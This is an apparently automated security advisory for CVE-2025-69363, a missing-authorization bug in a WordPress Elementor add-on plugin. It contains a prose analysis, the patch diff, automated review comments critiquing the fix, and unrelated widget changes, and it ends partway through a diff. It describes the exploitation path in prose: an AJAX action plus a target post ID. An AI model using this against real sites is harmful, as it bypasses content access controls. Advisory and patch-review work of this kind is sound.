Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-69363: Responsive Addons for Elementor <= 2.0.8 – Missing Authorization (responsive-addons-for-elementor)

Severity: Medium (CVSS 4.3)
CWE: 862
Vulnerable Version: 2.0.8
Patched Version: 2.0.9
Disclosed: January 11, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69363:
The Responsive Addons for Elementor plugin for WordPress, versions up to and including 2.0.8, contains a missing authorization vulnerability. This flaw allows authenticated users with Contributor-level permissions or higher to duplicate posts without proper capability checks, violating the WordPress permission model.

Atomic Edge research identifies the root cause in the `class-rael-duplicator.php` file. The plugin’s post duplication functionality lacked authorization checks in multiple critical functions. The `rae_get_duplicate_link` function (line 83), `rae_register_bulk_action` function (line 100), `rae_handle_bulk_action` function (line 115), and `rae_duplicate_post_handler` function (line 184) all executed without verifying the user’s permissions to duplicate specific posts. This omission created a capability bypass vulnerability.

The exploitation method involves authenticated attackers with Contributor-level access or higher accessing the post duplication endpoints. Attackers can trigger the vulnerability through the AJAX handler at `/wp-admin/admin-ajax.php` with the action parameter set to `rael_duplicate_post`, or through bulk actions in the WordPress admin interface. The attacker supplies a target post ID parameter to duplicate posts they should not have permission to modify, including published posts and password-protected content.

The patch introduces a new private method `rae_user_can_duplicate_post` (lines 359-393) that performs comprehensive capability checks. This method verifies the post exists, checks if the user can edit the post via `current_user_can( 'edit_post', $post_id )`, and adds specific restrictions for Contributor users. Contributors cannot duplicate non-published posts or password-protected posts. The patch integrates this check into all four vulnerable functions, returning empty strings, skipping unauthorized posts, or displaying error messages as appropriate.

Successful exploitation allows authenticated attackers to duplicate any post on the WordPress site, regardless of ownership or publication status. This violates the intended WordPress permission model where Contributors can only edit their own unpublished posts. Attackers can duplicate sensitive content, create unauthorized copies of restricted posts, and potentially disrupt site content management. The vulnerability does not directly enable privilege escalation but bypasses content-level access controls.

Differential between vulnerable and patched code

Code Diff
--- a/responsive-addons-for-elementor/ext/class-rael-duplicator.php
+++ b/responsive-addons-for-elementor/ext/class-rael-duplicator.php
@@ -83,6 +83,10 @@
 	 */
 	public function rae_get_duplicate_link( $post_id ) {

+		if ( ! $this->rae_user_can_duplicate_post( $post_id ) ) {
+			return '';
+		}
+
 		 $url = wp_nonce_url(
 			admin_url( 'admin.php?action=rael_duplicate_post&post=' . $post_id ),
 			'rael_duplicate_post_' . $post_id
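Review bot: `$post_id` is still concatenated into the `admin_url()` string and the nonce action without normalisation in the lines directly below the new guard in `rae_get_duplicate_link`; cast it once at the top of the method with `absint( $post_id )` so the guard, the URL and the nonce action all see the same integer. Returning `''` only hides the link, so enforcement still depends on the same check being made in the request handler.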
@@ -100,6 +104,9 @@
 	 * Add bulk action
 	 */
 	public function rae_register_bulk_action( $bulk_actions ) {
+		if ( ! current_user_can( 'edit_posts' ) ) {
+			return $bulk_actions;
+		}
 		$bulk_actions['rael_duplicate'] = __( 'Duplicate', 'responsive-addons-for-elementor' );
 		return $bulk_actions;
 	}
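Review bot: `current_user_can( 'edit_posts' )` in `rae_register_bulk_action` is a display gate keyed to the generic post capability, so on a post type registered with its own capability type it can show or hide the "Duplicate" action for the wrong users. Check the edit capability of the post type the list table is showing (the post type object's `cap->edit_posts`) and add a comment that the per-post decision is made in the bulk handler, not here.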
@@ -115,6 +122,9 @@
 		}

 		foreach ( $post_ids as $post_id ) {
+			if ( ! $this->rae_user_can_duplicate_post( $post_id ) ) {
+				continue;
+			}
 			$this->rae_duplicate( $post_id );
 		}

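Review bot: the `continue` inside the `foreach` drops unauthorized IDs silently, so a bulk request in which every post is refused looks the same to the user as one that succeeded. Count the skipped IDs and report them in whatever notice the handler shows afterwards, and cast each `$post_id` with `absint()` before passing it to the check.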
@@ -184,6 +194,10 @@
 			wp_die( esc_html__( 'Invalid request.', 'responsive-addons-for-elementor' ) );
 		}

+		if ( ! $this->rae_user_can_duplicate_post( $post_id ) ) {
+			wp_die( esc_html__( 'You are not allowed to duplicate this post.', 'responsive-addons-for-elementor' ) );
+		}
+
 		$new_id = $this->rae_duplicate( $post_id );

 		if ( is_wp_error( $new_id ) ) {
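Review bot: the new `wp_die()` in `rae_duplicate_post_handler` sets no response code, so a refused duplication falls back to `wp_die()`'s default status instead of 403. Pass it explicitly, for example `wp_die( $message, '', array( 'response' => 403 ) )`, which also makes refused attempts easy to pick out of access logs. Placing the check before `rae_duplicate()` is correct.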
@@ -345,6 +359,32 @@
 		' );
 	}

+	/* Added to Fix vulnerability */
+	private function rae_user_can_duplicate_post( $post_id ) {
+		$post = get_post( $post_id );
+		if ( ! $post ) {
+			return false;
+		}
+
+		if ( ! current_user_can( 'edit_post', $post_id ) ) {
+			return false;
+		}
+
+		if ( current_user_can( 'contributor' ) && ! current_user_can( 'edit_others_posts' ) ) {
+
+			if ( $post->post_status !== 'publish' ) {
+				return false;
+			}
+
+			if ( ! empty( $post->post_password ) ) {
+				return false;
+			}
+		}
+
+		return true;
+	}
+
+

 	}

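Review bot: in `rae_user_can_duplicate_post` the Contributor branch refuses every post whose status is not `publish`, but a Contributor only passes the preceding `edit_post` check for their own unpublished posts, so with default roles the two conditions together refuse every duplication by a Contributor. If that is the intent, return false for that role directly and say so in a docblock; if Contributors are meant to copy their own drafts, the status test is inverted. Separately, `current_user_can( 'contributor' )` passes a role name where a capability is expected, which WordPress discourages; a capability such as `publish_posts` expresses the same boundary. The one-line `/* Added to Fix vulnerability */` comment should become a docblock with `@param` and `@return`.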
--- a/responsive-addons-for-elementor/includes/widgets-manager/widgets/class-responsive-addons-for-elementor-image-gallery.php
+++ b/responsive-addons-for-elementor/includes/widgets-manager/widgets/class-responsive-addons-for-elementor-image-gallery.php
@@ -90,6 +90,8 @@
 		return array(
 			'swiper',
 			'e-swiper',
+			'elementor-icons',
+			'elementor-editor'
 		);
 	}
 	/**
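Review bot: `'elementor-editor'` is added next to `'swiper'` and `'e-swiper'` in this dependency list, which reads as an editor asset being requested wherever the gallery widget is rendered; confirm the handle is needed outside the editor, or keep only `'elementor-icons'` for the `eicon-*` classes introduced later in this file. The new last element also lacks the trailing comma the other entries have.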
@@ -1728,15 +1730,15 @@
 				'options'      => array(
 					'left'   => array(
 						'title' => __( 'Left', 'responsive-addons-for-elementor' ),
-						'icon'  => 'fa fa-align-left',
+						'icon'  => 'eicon-text-align-left',
 					),
 					'center' => array(
 						'title' => __( 'Center', 'responsive-addons-for-elementor' ),
-						'icon'  => 'fa fa-align-center',
+						'icon'  => 'eicon-text-align-center',
 					),
 					'right'  => array(
 						'title' => __( 'Right', 'responsive-addons-for-elementor' ),
-						'icon'  => 'fa fa-align-right',
+						'icon'  => 'eicon-text-align-right',
 					),
 				),
 				'default'      => 'center',
@@ -1882,6 +1884,17 @@
 				),
 			)
 		);
+		$this->add_responsive_control(
+			'rael_filterable_tab__border_radius',
+			array(
+				'label'      => esc_html__( 'Border Radius', 'responsive-addons-for-elementor' ),
+				'type'       => Controls_Manager::DIMENSIONS,
+				'size_units' => array( 'px', 'em', '%' ),
+				'selectors'  => array(
+					'{{WRAPPER}} .rael-masonry-filter' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+				),
+			)
+		);

 		$this->end_controls_tab();

@@ -1899,11 +1912,11 @@
 		$this->add_control(
 			'rael_cat_filter_hover_color',
 			array(
-				'label'     => __( 'Text Active / Hover Color', 'responsive-addons-for-elementor' ),
+				'label'     => __( 'Text Hover Color', 'responsive-addons-for-elementor' ),
 				'type'      => Controls_Manager::COLOR,
 				'default'   => '#ffffff',
 				'selectors' => array(
-					'{{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-masonry-filter:hover, {{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-current' => 'color: {{VALUE}};',
+					'{{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-masonry-filter:hover' => 'color: {{VALUE}};',
 				),
 				'condition' => array(
 					'rael_gallery_style'          => array( 'grid', 'masonry', 'justified' ),
@@ -1915,7 +1928,7 @@
 		$this->add_control(
 			'rael_cat_filter_bg_hover_color',
 			array(
-				'label'     => __( 'Background Active / Hover Color', 'responsive-addons-for-elementor' ),
+				'label'     => __( 'Background Hover Color', 'responsive-addons-for-elementor' ),
 				'type'      => Controls_Manager::COLOR,
 				'global'    => array(
 					'default' => Global_Colors::COLOR_ACCENT,
@@ -1929,22 +1942,97 @@
 				),
 			)
 		);
+		$this->add_group_control(
+			Group_Control_Border::get_type(),
+			array(
+				'name'      => 'cat_filter_border_hover',
+				'label'     => __( 'Border', 'responsive-addons-for-elementor' ),
+				'selector'  => '{{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-masonry-filter:hover, {{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-filters-dropdown-button',
+				'condition' => array(
+					'rael_gallery_style'          => array( 'grid', 'masonry', 'justified' ),
+					'rael_masonry_filters_enable' => 'yes',
+				),
+			)
+		);
+		$this->add_responsive_control(
+			'rael_filterable_tab__border_radius_hover',
+			array(
+				'label'      => esc_html__( 'Border Radius', 'responsive-addons-for-elementor' ),
+				'type'       => Controls_Manager::DIMENSIONS,
+				'size_units' => array( 'px', 'em', '%' ),
+				'selectors'  => array(
+					'{{WRAPPER}} .rael-masonry-filter:hover' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+				),
+			)
+		);
+
+		$this->end_controls_tab();
+
+		//Active Tab
+		$this->start_controls_tab(
+			'rael_cat_filters_active',
+			array(
+				'label'     => __( 'Active', 'responsive-addons-for-elementor' ),
+				'condition' => array(
+					'rael_gallery_style'          => array( 'grid', 'masonry', 'justified' ),
+					'rael_masonry_filters_enable' => 'yes',
+				),
+			)
+		);
+
+		$this->add_control(
+			'rael_cat_filter_active_color',
+			array(
+				'label'     => __( 'Text Active Color', 'responsive-addons-for-elementor' ),
+				'type'      => Controls_Manager::COLOR,
+				'default'   => '#ffffff',
+				'selectors' => array(
+					'{{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-current' => 'color: {{VALUE}};',
+				),
+				'condition' => array(
+					'rael_gallery_style'          => array( 'grid', 'masonry', 'justified' ),
+					'rael_masonry_filters_enable' => 'yes',
+				),
+			)
+		);

 		$this->add_control(
-			'rael_cat_filter_border_hover_color',
+			'rael_cat_filter_bg_active_color',
 			array(
-				'label'     => __( 'Border Hover Color', 'responsive-addons-for-elementor' ),
+				'label'     => __( 'Background Active Color', 'responsive-addons-for-elementor' ),
 				'type'      => Controls_Manager::COLOR,
 				'global'    => array(
 					'default' => Global_Colors::COLOR_ACCENT,
 				),
 				'selectors' => array(
-					'{{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-masonry-filter:hover, {{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-current' => 'border-color: {{VALUE}};',
+					'{{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-current' => 'background-color: {{VALUE}};',
+				),
+				'condition' => array(
+					'rael_gallery_style'          => array( 'grid', 'masonry', 'justified' ),
+					'rael_masonry_filters_enable' => 'yes',
 				),
+			)
+		);
+		$this->add_group_control(
+			Group_Control_Border::get_type(),
+			array(
+				'name'      => 'cat_filter_border_active',
+				'label'     => __( 'Border', 'responsive-addons-for-elementor' ),
+				'selector'  => '{{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-masonry-filter.rael-current, {{WRAPPER}} .rael-gallery-parent .rael-masonry-filters .rael-filters-dropdown-button',
 				'condition' => array(
-					'rael_gallery_style'             => array( 'grid', 'masonry', 'justified' ),
-					'rael_masonry_filters_enable'    => 'yes',
-					'rael_cat_filter_border_border!' => '',
+					'rael_gallery_style'          => array( 'grid', 'masonry', 'justified' ),
+					'rael_masonry_filters_enable' => 'yes',
+				),
+			)
+		);
+		$this->add_responsive_control(
+			'rael_filterable_tab__border_radius_active',
+			array(
+				'label'      => esc_html__( 'Border Radius', 'responsive-addons-for-elementor' ),
+				'type'       => Controls_Manager::DIMENSIONS,
+				'size_units' => array( 'px', 'em', '%' ),
+				'selectors'  => array(
+					'{{WRAPPER}} .rael-masonry-filter.rael-current' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
 				),
 			)
 		);
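Review bot: the control ID `rael_cat_filter_border_hover_color` is replaced in place by `rael_cat_filter_bg_active_color` with a different CSS property, so a border hover color already saved under the old ID is orphaned after the update and nothing maps it to the new `cat_filter_border_hover` group control. Add a migration or keep reading the old key. Both new border group controls (`cat_filter_border_hover` and `cat_filter_border_active`) also list `.rael-filters-dropdown-button` in their selector, so the two settings compete for that element, and the new border-radius controls carry no `condition` while the sibling controls in the same tabs do.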
--- a/responsive-addons-for-elementor/includes/widgets-manager/widgets/class-responsive-addons-for-elementor-search-form.php
+++ b/responsive-addons-for-elementor/includes/widgets-manager/widgets/class-responsive-addons-for-elementor-search-form.php
@@ -111,6 +111,21 @@
 				'frontend_available' => true,
 			)
 		);
+		$this->add_control(
+		'rael_minimal_show_icon',
+			array(
+				'label'        => __( 'Show Icon', 'responsive-addons-for-elementor' ),
+				'type'         => Controls_Manager::SWITCHER,
+				'label_on'     => __( 'Show', 'responsive-addons-for-elementor' ),
+				'label_off'    => __( 'Hide', 'responsive-addons-for-elementor' ),
+				'return_value' => 'yes',
+				'default'      => 'yes',
+				'condition' => array(
+					'rael_skin' => 'minimal',
+				),
+			)
+		);
+

 		$this->add_control(
 			'rael_placeholder',
@@ -143,6 +158,7 @@
 				'options'      => array(
 					'icon' => __( 'Icon', 'responsive-addons-for-elementor' ),
 					'text' => __( 'Text', 'responsive-addons-for-elementor' ),
+					'both' => __( 'Both', 'responsive-addons-for-elementor' ),
 				),
 				'prefix_class' => 'rael-elementor-search-form--button-type-',
 				'render_type'  => 'template',
@@ -160,7 +176,7 @@
 				'default'   => __( 'Search', 'responsive-addons-for-elementor' ),
 				'separator' => 'after',
 				'condition' => array(
-					'rael_button_type' => 'text',
+					'rael_button_type' => array( 'text','both' ),
 					'rael_skin'        => 'classic',
 				),
 			)
@@ -169,26 +185,18 @@
 		$this->add_control(
 			'rael_icon',
 			array(
-				'label'        => __( 'Icon', 'responsive-addons-for-elementor' ),
-				'type'         => Controls_Manager::CHOOSE,
-				'default'      => 'search',
-				'options'      => array(
-					'search' => array(
-						'title' => __( 'Search', 'responsive-addons-for-elementor' ),
-						'icon'  => 'eicon-search',
-					),
-					'arrow'  => array(
-						'title' => __( 'Arrow', 'responsive-addons-for-elementor' ),
-						'icon'  => 'eicon-arrow-right',
-					),
+				'label'            => esc_html__( 'Icon', 'responsive-addons-for-elementor' ),
+				'type'             => Controls_Manager::ICONS,
+				'default' => array(
+					'value'   => 'fas fa-search',
+					'library' => 'fa-solid',
 				),
-				'render_type'  => 'template',
-				'prefix_class' => 'rael-elementor-search-form--icon-',
 				'condition'    => array(
-					'rael_button_type' => 'icon',
+					'rael_button_type' => array( 'icon','both' ),
 					'rael_skin'        => 'classic',
 				),
 			)
+
 		);

 		$this->add_control(
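Review bot: `rael_icon` changes from a `CHOOSE` control that stores the string `'search'` or `'arrow'` to an `ICONS` control that stores a `value`/`library` array, and nothing in the hunk handles widgets saved in the old format. Map the legacy strings to an icon array before the value reaches the renderer. Dropping `prefix_class` also removes the `rael-elementor-search-form--icon-*` wrapper class, so check that no stylesheet rule still depends on it.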
@@ -201,7 +209,7 @@
 				),
 				'selectors' => array(
 					'{{WRAPPER}} .rael-elementor-search-form__container' => 'min-height: {{SIZE}}{{UNIT}}',
-					'{{WRAPPER}} .rael-elementor-search-form__submit' => 'min-width: {{SIZE}}{{UNIT}}',
+					'{{WRAPPER}} .rael-elementor-search-form__submit.txt_icon' => 'min-width: {{SIZE}}{{UNIT}}',
 					'body:not(.rtl) {{WRAPPER}} .rael-elementor-search-form__icon' => 'padding-left: calc({{SIZE}}{{UNIT}} / 3)',
 					'body.rtl {{WRAPPER}} .rael-elementor-search-form__icon' => 'padding-right: calc({{SIZE}}{{UNIT}} / 3)',
 					'{{WRAPPER}} .rael-elementor-search-form__input, {{WRAPPER}}.rael-elementor-search-form--button-type-text .rael-elementor-search-form__submit' => 'padding-left: calc({{SIZE}}{{UNIT}} / 3); padding-right: calc({{SIZE}}{{UNIT}} / 3)',
@@ -225,6 +233,21 @@
 		);

 		$this->add_control(
+			'rael_toggle_icon',
+			array(
+				'label'            => esc_html__( 'Icon', 'responsive-addons-for-elementor' ),
+				'type'             => Controls_Manager::ICONS,
+				'condition'    => array(
+					'rael_skin' => 'full_screen',
+				),
+				'default' => array(
+					'value'   => 'fas fa-search',
+					'library' => 'fa-solid',
+				),
+			)
+
+		);
+		$this->add_control(
 			'rael_toggle_align',
 			array(
 				'label'     => __( 'Alignment', 'responsive-addons-for-elementor' ),
@@ -263,6 +286,7 @@
 				),
 				'selectors' => array(
 					'{{WRAPPER}} .rael-elementor-search-form__toggle i' => 'font-size: {{SIZE}}{{UNIT}}; width: {{SIZE}}{{UNIT}}; height: {{SIZE}}{{UNIT}}',
+					'{{WRAPPER}} .rael-elementor-search-form__toggle svg' => 'font-size: {{SIZE}}{{UNIT}}; width: {{SIZE}}{{UNIT}}; height: {{SIZE}}{{UNIT}};padding:6px',
 				),
 				'condition' => array(
 					'rael_skin' => 'full_screen',
@@ -293,9 +317,11 @@
 				),
 				'selectors' => array(
 					'{{WRAPPER}} .rael-elementor-search-form__icon' => 'font-size: {{SIZE}}{{UNIT}}',
+					'{{WRAPPER}} .rael-elementor-search-form__submit.txt_icon' => 'font-size: {{SIZE}}{{UNIT}}',
 				),
 				'condition' => array(
 					'rael_skin' => 'minimal',
+					'rael_minimal_show_icon' => 'yes',
 				),
 				'separator' => 'before',
 			)
@@ -664,7 +690,7 @@
 				'label'     => __( 'Color', 'responsive-addons-for-elementor' ),
 				'type'      => Controls_Manager::COLOR,
 				'selectors' => array(
-					'{{WRAPPER}} .rael-elementor-search-form__toggle' => 'color: {{VALUE}}; border-color: {{VALUE}}',
+					'{{WRAPPER}} .rael-elementor-search-form__toggle svg path' => 'fill: {{VALUE}}; border-color: {{VALUE}}',
 				),
 			)
 		);
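Review bot: the toggle color selector now matches only `.rael-elementor-search-form__toggle svg path`, so the color stops applying when the chosen icon is rendered as an `<i>` font icon instead of inline SVG, and the `border-color` that was kept in the declaration has no effect on a `path`. Keep the original `.rael-elementor-search-form__toggle` entry for `color` and `border-color` and add the `svg path` fill as a second selector entry.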
@@ -675,7 +701,7 @@
 				'label'     => __( 'Background Color', 'responsive-addons-for-elementor' ),
 				'type'      => Controls_Manager::COLOR,
 				'selectors' => array(
-					'{{WRAPPER}} .rael-elementor-search-form__toggle i' => 'background-color: {{VALUE}}',
+					'{{WRAPPER}} .rael-elementor-search-form__toggle svg' => 'background-color: {{VALUE}};padding: 6px;',
 				),
 			)
 		);
@@ -779,32 +805,6 @@
 			)
 		);

-		// Set the selected icon.
-		$icon_class = '';
-		if ( 'icon' === $settings['rael_button_type'] ) {
-			$icon_class = 'search';
-
-			if ( 'arrow' === $settings['rael_icon'] ) {
-				$icon_class = is_rtl() ? 'arrow-left' : 'arrow-right';
-			}
-
-			$this->add_render_attribute(
-				'icon',
-				array(
-					'class' => 'fa fa-' . $icon_class,
-				)
-			);
-		} elseif ( 'text' === $settings['rael_button_type'] && 'full_screen' === $settings['rael_skin'] ) {
-			$icon_class = 'search';
-
-			$this->add_render_attribute(
-				'icon',
-				array(
-					'class' => 'fa fa-' . $icon_class,
-				)
-			);
-		}
-

 		$migration_allowed = Icons_Manager::is_migration_allowed();
 		$icon              = array(
@@ -816,31 +816,52 @@
 			<?php do_action( 'rael_search_form_before_input', $this ); ?>
 			<?php if ( 'full_screen' === $settings['rael_skin'] ) : ?>
 				<div class="rael-elementor-search-form__toggle">
-					<?php if ( ! $migration_allowed || ! Icons_Manager::render_icon( $settings['rael_icon'], array( 'aria-hidden' => 'true' ) ) ) { ?>
-						<i class="fa fas fa-search" aria-hidden="true"></i>
-					<?php } ?>
+						<?php
+						if(!empty($settings['rael_toggle_icon'])){
+							Icons_Manager::render_icon( $settings['rael_toggle_icon'] );
+						} ?>
+
 					<span class="elementor-screen-only"><?php esc_html_e( 'Search', 'responsive-addons-for-elementor' ); ?></span>
 				</div>
 			<?php endif; ?>
 			<div class="rael-elementor-search-form__container">
 				<?php if ( 'minimal' === $settings['rael_skin'] ) : ?>
 					<div class="rael-elementor-search-form__icon">
+						<?php  if( $settings['rael_minimal_show_icon'] == 'yes' ){ ?>
 						<i class="fa fa-search" aria-hidden="true"></i>
+						<?php } ?>
 						<span class="elementor-screen-only"><?php esc_html_e( 'Search', 'responsive-addons-for-elementor' ); ?></span>
 					</div>
 				<?php endif; ?>
 				<input <?php echo wp_kses_post( $this->get_render_attribute_string( 'input' ) ); ?>>
 				<?php do_action( 'rael_search_form_after_input', $this ); ?>
-				<?php if ( 'classic' === $settings['rael_skin'] ) : ?>
-					<button class="rael-elementor-search-form__submit" type="submit" title="<?php esc_attr_e( 'Search', 'responsive-addons-for-elementor' ); ?>" aria-label="<?php esc_attr_e( 'Search', 'responsive-addons-for-elementor' ); ?>">
-						<?php if ( 'icon' === $settings['rael_button_type'] ) : ?>
-							<i <?php echo wp_kses_post( $this->get_render_attribute_string( 'icon' ) ); ?> aria-hidden="true"></i>
-							<span class="elementor-screen-only"><?php esc_html_e( 'Search', 'responsive-addons-for-elementor' ); ?></span>
-						<?php elseif ( ! empty( $settings['rael_button_text'] ) ) : ?>
-							<?php echo wp_kses_post( $settings['rael_button_text'] ); ?>
-						<?php endif; ?>
+				<?php if ( 'classic' === $settings['rael_skin'] ) :
+				if ( in_array( $settings['rael_button_type'], [ 'text', 'icon' ], true )){
+					$btnclass = 'txt_icon';
+				}
+				else{
+					$btnclass = 'both_cls';
+				}
+					?>
+					<button class="rael-elementor-search-form__submit <?php echo $btnclass; ?>" type="submit" title="<?php esc_attr_e( 'Search', 'responsive-addons-for-elementor' ); ?>" aria-label="<?php esc_attr_e( 'Search', 'responsive-addons-for-elementor' ); ?>">
+						<?php
+					// TEXT should show if button_type is "text" OR "both"
+					if ( in_array( $settings['rael_button_type'], [ 'text', 'both' ], true ) && ! empty( $settings['rael_button_text'] ) ) : ?>
+						<span class="rael-button-text"><?php echo wp_kses_post( $settings['rael_button_text'] ); ?></span>
+					<?php endif; ?>
+					<?php endif; ?>
+					<?php // ICON should show if button_type is "icon" OR "both"
+					if ( 'classic' === $settings['rael_skin'] && in_array( $settings['rael_button_type'], [ 'icon', 'both' ], true ) ) : ?>
+						<?php if(!empty($settings['rael_icon'])){
+							Icons_Manager::render_icon( $settings['rael_icon'] );
+							} ?>
+						<span class="elementor-screen-only"><?php esc_html_e( 'Search', 'responsive-addons-for-elementor' ); ?></span>
 					</button>
-				<?php endif; ?>
+
+					<?php endif; ?>
+
+
+
 				<?php if ( 'full_screen' === $settings['rael_skin'] ) : ?>
 					<div class="dialog-lightbox-close-button dialog-close-button">
 						<i class="eicon-close" aria-hidden="true"></i>
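Review bot: the `<button class="rael-elementor-search-form__submit ...">` is opened inside the first `classic` block, but its `</button>` now sits inside the second condition, which only matches button type `icon` or `both`, so a classic form with button type `text` emits a button that is never closed. Wrap the whole button in a single `if ( 'classic' === $settings['rael_skin'] ) : ... endif;` and nest the text and icon conditions inside it. `<?php echo $btnclass; ?>` should also go through `esc_attr()` even though it is currently one of two literals, and `$settings['rael_minimal_show_icon'] == 'yes'` should use `===`.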
@@ -860,53 +881,7 @@
 	 * @since 1.2.0
 	 * @access protected
 	 */
-	protected function content_template() {
-		?>
-		<#
-		var iconClass = 'fa fas fa-search';

-		if ( 'arrow' == settings.rael_icon ) {
-			if ( elementorCommon.config.isRTL ) {
-				iconClass = 'fa fas fa-arrow-left';
-			} else {
-				iconClass = 'fa fas fa-arrow-right';
-			}
-		}
-		#>
-		<form class="rael-elementor-search-form" action="" role="search">
-			<# if ( 'full_screen' == settings.rael_skin ) { #>
-			<div class="rael-elementor-search-form__toggle">
-				<i class="fa fas fa-search" aria-hidden="true"></i>
-				<span class="elementor-screen-only"><?php esc_html_e( 'Search', 'responsive-addons-for-elementor' ); ?></span>
-			</div>
-			<# } #>
-			<div class="rael-elementor-search-form__container">
-				<# if ( 'minimal' == settings.rael_skin ) { #>
-				<div class="rael-elementor-search-form__icon">
-					<i class="fa fas fa-search" aria-hidden="true"></i>
-					<span class="elementor-screen-only"><?php esc_html_e( 'Search', 'responsive-addons-for-elementor' ); ?></span>
-				</div>
-				<# } #>
-				<input type="search"
-						name="s"
-						title="<?php esc_attr_e( 'Search', 'responsive-addons-for-elementor' ); ?>"
-						class="rael-elementor-search-form__input"
-						placeholder="{{ settings.rael_placeholder }}">
-
-				<# if ( 'classic' == settings.rael_skin ) { #>
-				<button class="rael-elementor-search-form__submit" type="submit">
-					<# if ( 'icon' == settings.rael_button_type ) { #>
-					<i class="{{ iconClass }}" aria-hidden="true"></i>
-					<span class="elementor-screen-only"><?php esc_html_e( 'Submit', 'responsive-addons-for-elementor' ); ?></span>
-					<# } else if ( settings.rael_button_text ) { #>
-					{{{ settings.rael_button_text }}}
-					<# } #>
-				</button>
-				<# } #>
-			</div>
-		</form>
-		<?php
-	}

 	/**
 	 * Get Custom help URL
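Review bot: deleting `content_template()` leaves its docblock behind (the comment ending in `@since 1.2.0` and `@access protected`), which now sits directly above the docblock for "Get Custom help URL". Remove the orphaned comment together with the method.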
--- a/responsive-addons-for-elementor/includes/widgets-manager/widgets/class-responsive-addons-for-elementor-testimonial-slider.php
+++ b/responsive-addons-for-elementor/includes/widgets-manager/widgets/class-responsive-addons-for-elementor-testimonial-slider.php
@@ -155,6 +155,23 @@
 				'type'  => Controls_Manager::TEXTAREA,
 			)
 		);
+
+
+		$repeater->add_control(
+			'testimonial_rating',
+			array(
+				'label'   => __( 'Testimonial Rating', 'responsive-addons-for-elementor' ),
+				'type'    => Controls_Manager::SELECT,
+				'default' => '5',
+				'options' => array(
+					'1' => '1',
+					'2' => '2',
+					'3' => '3',
+					'4' => '4',
+					'5' => '5',
+				),
+			)
+		);

 		$repeater->add_control(
 			'image',
@@ -194,6 +211,17 @@
 				'separator' => 'after',
 			)
 		);
+		$this->add_control(
+			'enable_rating',
+			array(
+				'label'        => __( 'Enable Rating', 'responsive-addons-for-elementor' ),
+				'type'         => Controls_Manager::SWITCHER,
+				'label_on'     => __( 'Yes', 'responsive-addons-for-elementor' ),
+				'label_off'    => __( 'No', 'responsive-addons-for-elementor' ),
+				'return_value' => 'yes',
+				'default'      => 'yes',
+			)
+		);

 		$this->add_responsive_control(
 			'rael_icon_size',
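Review bot: `enable_rating` defaults to `'yes'` and the `testimonial_rating` repeater field added in the previous hunk defaults to `'5'`, so sliders that never configured a rating can start showing five stars on every testimonial after the update. Default the switcher to off so the rating is opt-in for existing content.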
@@ -345,7 +373,7 @@
 				'render_type'        => 'template',
 				'frontend_available' => true,
 			)
-		);
+		);

 		$this->add_control(
 			'pagination',
@@ -660,7 +688,21 @@
 				'tab'   => Controls_Manager::TAB_STYLE,
 			)
 		);
-
+		$this->add_control(
+			'testimonial_content_background_color',
+			array(
+				'label'     => __( 'Background Color', 'responsive-addons-for-elementor' ),
+				'type'      => Controls_Manager::COLOR,
+				'alpha'     => false,
+				'default' => '#e6e9ec',
+				'selectors' => array(
+					'{{WRAPPER}} .responsive-testimonial__content, {{WRAPPER}} .responsive-testimonial__content:after' => 'background-color: {{VALUE}}',
+				),
+				'condition' => array(
+					'skin' => 'bubble',
+				),
+			)
+		);
 		$this->add_responsive_control(
 			'content_gap',
 			array(
@@ -848,6 +890,16 @@
 				),
 			)
 		);
+		$this->add_responsive_control(
+			'image_margin',
+			array(
+				'label' => __( 'Margin', 'responsive-addons-for-elementor' ),
+				'type'  => Controls_Manager::DIMENSIONS,
+				'selectors' => array(
+					'{{WRAPPER}} .responsive-testimonial__image' => 'margin: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+				),
+			)
+		);

 		$this->add_control(
 			'image_border',
@@ -963,9 +1015,94 @@

 		$this->end_controls_tab();
 		$this->end_controls_tabs();
+
+
+		$this->end_controls_section();
+		$this->start_controls_section(
+			'section_rating_style',
+			[
+				'label' => __( 'Rating', 'responsive-addons-for-elementor' ),
+				'tab'   => Controls_Manager::TAB_STYLE,
+			]
+		);
+
+		$this->add_control(
+			'rating_color',
+			[
+				'label' => __( 'Color', 'responsive-addons-for-elementor' ),
+				'type'  => Controls_Manager::COLOR,
+				'default' => '#ffb400',
+				'selectors' => [
+					'{{WRAPPER}} .rael-rating-stars i' => 'color: {{VALUE}};',
+
+				],
+			]
+		);
+
+		$this->add_responsive_control(
+			'rating_icon_size',
+			[
+				'label' => __( 'Icon Size', 'responsive-addons-for-elementor' ),
+				'type' => Controls_Manager::SLIDER,
+				'range' => [
+					'px' => [
+						'min' => 8,
+						'max' => 60,
+					],
+				],
+				'default' => array('size' => '17', 'unit' => 'px' ),
+				'selectors' => [
+					'{{WRAPPER}} .rael-rating-stars i' => 'font-size: {{SIZE}}{{UNIT}};',
+				],
+			]
+		);
+
+		$this->add_responsive_control(
+			'rating_item_margin_right',
+			[
+				'label' => __( 'Items Margin Right', 'responsive-addons-for-elementor' ),
+				'type'  => Controls_Manager::SLIDER,
+				'range' => [
+					'px' => [
+						'min' => 0,
+						'max' => 40,
+					],
+				],
+				'selectors' => [
+					'{{WRAPPER}} .rael-rating-stars i' => 'margin-right: {{SIZE}}{{UNIT}};',
+				],
+				'default' => [
+					'size' => 5,
+					'unit' => 'px',
+				],
+			]
